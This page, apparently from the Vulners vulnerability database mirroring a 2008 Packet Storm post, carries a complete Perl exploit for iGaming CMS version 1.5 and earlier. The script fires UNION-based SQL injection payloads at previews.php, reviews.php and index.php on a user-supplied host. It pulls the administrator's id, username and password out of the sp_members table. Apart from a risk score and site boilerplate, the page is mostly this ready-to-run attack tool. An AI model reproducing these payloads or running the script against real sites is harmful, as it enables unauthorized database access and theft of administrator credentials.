Lucene search

K

igamingcms-sql.txt

🗓️ 24 Sep 2008 00:00:00Reported by StAkeRType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

iGaming <= 1.5 Remote SQL Injection Exploit in Per

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`#!/usr/bin/perl  
# ----------------------------------------------------------  
# iGaming <= 1.5 Multiple Remote SQL Injection Exploit  
# Perl Exploit - Output: id:admin:password  
# Discovered On: 23/09/2008  
# Discovered By: StAkeR - StAkeR[at]hotmail[dot]it  
# Proud To Be Italian   
# ----------------------------------------------------------  
# Usage: perl exploit.pl http://localhost/iGaming  
# ----------------------------------------------------------  
  
use strict;  
use LWP::UserAgent;  
  
my ($one,$two,$exec,$host,$http,$xxx,$view);  
  
$view = "'%20union%20select%200,0,1,2,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),0,6,7,8%20from%20sp_members%20WHERE%20id='1/*";  
$exec = "'%20union%20select%201,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),3%20from%20sp_members%20where%20id='1/*";  
$host = shift @ARGV;  
$http = new LWP::UserAgent or die $!;  
$http->agent("Mozilla/4.5 [en] (Win95; U)");  
$http->timeout(1);  
  
  
if($host !~ /^http:\/\/(.+?)$/)  
{  
print "[?] iGaming CMS <= 1.5 Multiple Remote SQL Injection Exploit\n";  
print "[?] Usage: perl $0 http://[path]\n";  
exit;  
}  
else  
{  
$one = $http->get($host.'/previews.php?browse='.$exec);  
$two = $http->get($host.'/reviews.php?browse='.$exec);  
$xxx = $http->get($host.'/index.php?do=viewarticle&id='.$view);  
  
if($one->is_success or $two->is_success or $xxx->is_success)  
{  
die "$1\n" if $one->content =~ /%(.+?)%/;  
die "$1\n" if $two->content =~ /%(.+?)%/;  
die "$1\n" if $xxx->content =~ /%(.+?)%/;  
}  
else  
{  
die "[+] Exploit Failed!\n";  
}  
}   
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
24 Sep 2008 00:00Current
7.4High risk
Vulners AI Score7.4
20
.json
Report